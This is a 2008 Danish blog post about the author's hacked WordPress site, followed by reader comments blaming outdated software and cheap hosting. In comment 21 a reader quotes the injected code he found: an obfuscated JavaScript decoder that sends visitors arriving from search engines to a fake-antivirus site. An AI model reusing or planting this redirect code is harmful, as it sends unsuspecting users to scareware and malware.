Jarls blog

Uafhængig liberal blog om dansk politik

jarlcordua.dk hacket

Author icon

Skrevet af

Clock icon

juli 17, 2008

Comments icon

23 kommentarer

Så skete det også for mig. Min blog blev hacket torsdag morgen. Det var ikke en skidebehagelig oplevelse. For at sige det mildt.

Computer-sitet CRN skrev endda om sagen:

Førende blogger hacket af malware-side

“Flere danske websteder er blevet hacket og videresender brugerne til en malware-side med falske sikkerheds-programmer. En af landets førende politiske bloggere er blandt ofrene”

Læs hele historien her.

“Førende blogger”. Det smager da lidt af fugl. Som Simon Spies sagde: Al presse er god presse! 😉

Var der tale om et venstreorienteret attack? Formentlig ikke. Det viser sig at en række såkaldte WordPress-blogs er blevet hacket worldwide.

Hurra til Lasse Birk Olesen (Oles lillebror) som sprang til og senere hjalp mig ud af suppedasen, sådan at Jarls Blog er oppe igen!

Lige et tip: Min udbyder firmaet “One.com” var ikke til meget hjælp. Det er ikke nogen, som jeg kan anbefale andre. De bad mig blot om at fjerne alt for så at starte forfra.

Her er min oplevelse formuleret på pidgin-dansk:

“Jeg sende penge hvert år til firmaet one.com. En dag jeg have problem. Jeg skrive til one.coms “support” (telefon findes ikke) One.com skrive de ikke kan hjælpe. Jeg klage. One.com. slå ud med armene: Ikke vores problem. Jeg fucking pissed”

Update mandag den 21.7 sitet Comon følger op på historien.

Om forfatteren

Jarl Cordua cand.polit, radiovært samt politisk kommentator. Vært på det politiske program "Cordua & Steno", der sendes hver torsdag kl 10-12 på Radio 24Syv. Indehaver af Jarls Blog siden 2006. Født 1969 i Rønne. Bor i Hellerup. Kontaktoplysninger: jarlATjarlcordua.dk Telefon: 2663 4128

    23 Comments

  1. Rasmus Malver

    sagde den 17. juli 2008 kl. 20:21:

    Det kunne have været værre… I det mindste var der ikke billeder af dig, med tilfældige nøgne rockere klippet ind.

  2. Jeppe Engell

    sagde den 17. juli 2008 kl. 20:35:

    Jeg er hos unoeuro.com som på trods af navnet er dansk og meget fornuftige…

  3. Martin Seebach

    sagde den 17. juli 2008 kl. 20:54:

    Det er pisse surt at blive hacket.. jeg har nogle år på bagen i web-branchen og har set en håndfuld angreb, og det er lige surt hver gang.

    Men at pege fingre af one.com (eller en hvilken som helst anden udbyder i “forbruger” kategorien, inkl. unoeuro) er ikke fair. Det svarer til at give gasselskabet skylden for at din bøf brænder på. Det er ganske enkelt ikke den service du har købt.

  4. Jarl Cordua

    sagde den 17. juli 2008 kl. 21:08:

    3. De kan sgu da hjælpe mig videre til nogen der kan hjælpe mig. Man er jo totalt prisgivet.

  5. Jacob Christensen

    sagde den 17. juli 2008 kl. 21:10:

    En lille teknisk note: Kigger jeg på kildekoden, står der, at du kører WordPress 2.1.3.

    Det er en ældre sag, og hvis det passer, kan det i så fald være en idé at opgradere til 2.5.1 eller 2.6 (jeg er næsten totalt kode-analfabet, men opgraderinger omfatter som regel også sikkerhedsopdateringer, så det er klogt at holde sig opdateret)

    😉

  6. Jarl Cordua

    sagde den 17. juli 2008 kl. 21:14:

    5. Ja. Det er skideirriterende at man skal bruge tid på al mulig teknisk fis, når man egentlig hellere vil skrive om politik.

    But I’ve learned my lesson. Jeg må nu bruge mere af min tid på det, som jeg finder er røvsygt. Men alt for læserne!

  7. Thomas

    sagde den 17. juli 2008 kl. 22:42:

    Hvis du ikke vil bøvle med det tekniske, hvorfor så ikke have bloggen liggende på wordpress.com, blogger.com, livejournal.com, typepad.com eller tilsvarende — altså udlicitere bøvlet?

  8. Morten

    sagde den 18. juli 2008 kl. 08:00:

    Det er ikke webhotellets ansvar at redde dig ud af suppedasen, når/hvis du bliver hacket, men helt og holdent din egen.

    Derfor er der jo kun for webhotellet at sige “forfra, desværre”, hvis du absolut vil spørge dem om hjælp.

    Det er vigtigt at vide, på samme måde som når/hvis ens computer bliver inficeret, hvad man skal gøre, ellers skal man holde sig fra at drive et website.

    Når din bil går i stykker, går man til en mekaniker. Hvis du ikke selv kan reparere dit website, så bør du jo have en leverandør i baghånden. Der er *ingen* webhoteller, der tilbyder som udgangspunkt at stå for at redde dig ud af suppedasen når/hvis du bliver hacket.

    Jeg kan godt se, at det er nemmere at brokke sig over webhotellet end at se indad først.

  9. Morten

    sagde den 18. juli 2008 kl. 08:02:

    Iøvrigt har du heller ikke sørget for at holde dig opdateret med sikkerhedsopdateringer til WordPress etc. – så er det jo klart, at man nærmest beder om at blive hacket !

    Gentager: Det er for svagt bare at skyde skylden på manglende fejlrettelse på dit webhotel, fejlen ligger hos dig.

  10. Morten

    sagde den 18. juli 2008 kl. 08:10:

    Og endelig skriver du, at du sender penge til one.com – ja, de 9 kroner + moms du giver hver måned er da mindre, end du drikker sodavand for, mens du læser disse kommentarer.

    Hvordan kan du forvente at have webhotel, email, email support (på det man kan forvente support på) – og så kritisere webhotellet.

    At one.com er et dårligt webhotel, kan vi hurtigt blive enige om, men det er altså noget med, hvilke forventninger man med rimelighed kan stille til sit webhotel, og der har du godt nok fuldstændigt misforstået situationen, ven !…

  11. Jarl Cordua

    sagde den 18. juli 2008 kl. 08:35:

    8-10

    Jeg noterer mig dine belæringer.

    “Det er vigtigt at vide, på samme måde som når/hvis ens computer bliver inficeret, hvad man skal gøre, ellers skal man holde sig fra at drive et website.”

    Jeg er fuldstændig uenig med dig. Jeg må kunne forvente et MINIMUM af vejledning. Det har one.com i øvrigt også indrømmet.

    Men jeg vil give dig så meget, at det er et wakeup-call for en IT-amatør som mig mht at få opdateret min sikkerhed.

  12. Peter Nielsen

    sagde den 18. juli 2008 kl. 10:02:

    Hvorfor bruger du egentlig ikke bare One.com’s eget rigtig gode blogmodul?

    Du kan jo ikke forvente, at de kan supportere tredepartssoftware, men jeg har aldrig haft problemer med support på deres blogmodul.

  13. Thomas Jacobsen

    sagde den 18. juli 2008 kl. 10:46:

    Umiddelbart er jeg meget enig med Morten (8-10) i hans anskuelser, men hele branchen burde nu også få sat mere fokus på bedre kundeservice og ryddet op i procedurer og betingelser.

    Jeg har været hos One og oplevet nogenlunde samme behandling – med ulovlige bindingsperioder. Siden har jeg været hos Surftown, som har ændret meget på forretningen og er blevet rigtigt gode.

    Du kan btw få 3 mdr. gratis WordPress hos dem 😉
    http://www.surftown.dk/?docid=0EEB6105-29D2-4F18-BD4D-F99812345BB7

  14. Morten

    sagde den 18. juli 2008 kl. 10:48:

    Jarl (11.) – belæringer er vel så meget sagt, bare mere en IT/web nørds tanker om din indstilling til teknik & webhotellers supportmuligheder 🙂

    Minimum af vejledning – > det fik du faktisk. Hvis du ikke har teknisk kunnen til at kunne rydde op efter et hacker angreb, bør du slette alle filer og starte forfra (eller fra en backup). Det var vel det (skriver du selv) at du fik at vide. Så du *fik* jo faktisk vejledning.

    Det *kræver* teknisk kunnen at rydde op efter et hackerangreb. Man skal være *sikker !* på at der ikke ligger noget tilbage, som kan bruges senere af hackeren/det automatiserede angreb.

    Wake-up call. -> Ja, enig, man bliver i den grad kaffe-vågen når man har været angrebet. Har selv ryddet op i 30-40 sites (på een gang!) efter hacker angreb (har den fornødne tekniske viden selv).

  15. Andreas

    sagde den 18. juli 2008 kl. 15:58:

    Bluehost har en automatisk WOrdpress-installation, som bliver opdateret og vedligeholdt uden at man skal gøre det store selv.

    Men jeg ved ikke om de tager .dk-domæner.

  16. niels s

    sagde den 18. juli 2008 kl. 19:06:

    Hej Jarl.

    Kunne du ikke bare have fulgt oc henstillingen, og have gen-indsat kopier af dine utvivlsomt sikkerhedskopierede filer?

    Nu, du lever af at ytre dig, har du vel løbende gemt et ekstra-sæt af alle perlerne et sted i cyberspace

    Det koster kun et tryk på en en tast.

    Og så er der ikke mere grund til højlydt it-jammer, højst lidt ærgelse i ny og næ

    vh

    ns

  17. Jarl Cordua

    sagde den 18. juli 2008 kl. 19:14:

    16. Jo såmænd. Det er der taget hånd om nu.

    NB. Jeg lever IKKE af at ytre mig. Desværre. Så god er verden ikke 🙂

  18. Rasmus Malver

    sagde den 19. juli 2008 kl. 14:51:

    Så er den nede igen. Det kan undgås, hvis man trykker ESC, når siden er loadet.

  19. Lasse Birk Olesen

    sagde den 19. juli 2008 kl. 15:57:

    Rasmus Malver, hvordan er den nede igen? Jeg mærker ikke noget.

  20. Rasmus Malver

    sagde den 20. juli 2008 kl. 10:36:

    Hmm… Firefox 3 på OS X.5 bliver stadig videresendt til en anden side.

  21. Rasmus Malver

    sagde den 20. juli 2008 kl. 10:43:

    Er det ikke den her, som ikke burde være der?

    function Decode(){var temp=””,i,c=0,out=””;var str=”60!115!99!114!105!112!116!62!10!118!97!114!32!114!101!102!101!114!114!101!114!32!61!32!83!116!114!105!110!103!40!100!111!99!117!109!101!110!116!46!114!101!102!101!114!114!101!114!41!46!116!111!76!111!119!101!114!67!97!115!101!40!41!59!10!118!97!114!32!117!114!108!115!32!61!32!110!101!119!32!65!114!114!97!121!40!41!59!10!117!114!108!115!46!112!117!115!104!40!34!97!115!107!46!99!111!109!34!41!59!10!117!114!108!115!46!112!117!115!104!40!34!103!111!111!103!108!101!34!41!59!10!117!114!108!115!46!112!117!115!104!40!34!109!115!110!46!99!111!109!34!41!59!10!117!114!108!115!46!112!117!115!104!40!34!108!105!118!101!46!99!111!109!34!41!59!10!117!114!108!115!46!112!117!115!104!40!34!97!111!108!46!99!111!109!34!41!59!10!117!114!108!115!46!112!117!115!104!40!34!97!108!116!97!118!105!115!116!97!46!99!111!109!34!41!59!10!117!114!108!115!46!112!117!115!104!40!34!101!120!99!105!116!101!46!99!111!109!34!41!59!10!117!114!108!115!46!112!117!115!104!40!34!121!97!104!111!111!46!99!111!109!34!41!59!10!102!111!114!32!40!118!97!114!32!105!61!48!59!32!105!60!117!114!108!115!46!108!101!110!103!116!104!59!32!105!43!43!41!32!123!10!105!102!32!40!83!116!114!105!110!103!40!114!101!102!101!114!114!101!114!41!46!115!101!97!114!99!104!40!117!114!108!115!91!105!93!41!32!33!61!32!45!49!41!32!123!10!100!111!99!117!109!101!110!116!46!119!114!105!116!101!40!39!60!109!101!116!97!32!104!116!116!112!45!101!113!117!105!118!61!34!114!101!102!114!101!115!104!34!32!99!111!110!116!101!110!116!61!34!48!59!117!114!108!61!104!116!116!112!58!47!47!119!105!110!100!111!119!115!45!97!110!116!105!118!105!114!117!115!45!50!48!48!56!46!99!111!109!47!34!62!39!41!59!10!98!114!101!97!107!59!10!125!125!10!60!47!115!99!114!105!112!116!62!32!”;l=str.length;while(c<=str.length-1){while(str.charAt(c)!=’!’)temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp=””;}document.write(out);}

  22. Aks

    sagde den 22. juli 2008 kl. 01:45:

    Hvis du har brug for hjælp til din blog.
    Så kig denne side ud.

    http://wordpress.dk/

    det er wordpress på dansk.
    Der også et supportforum.

    Hilsen Aks xom.dk

  23. Peter Bjørn Perlsø

    sagde den 26. juli 2008 kl. 23:36:

    gigahost.dk – ingen telefon, men god respons pr email, og kompetente folk bag skærmene, som du faktisk kan snakke med uden automatiserede svarsystemer.

Bottom border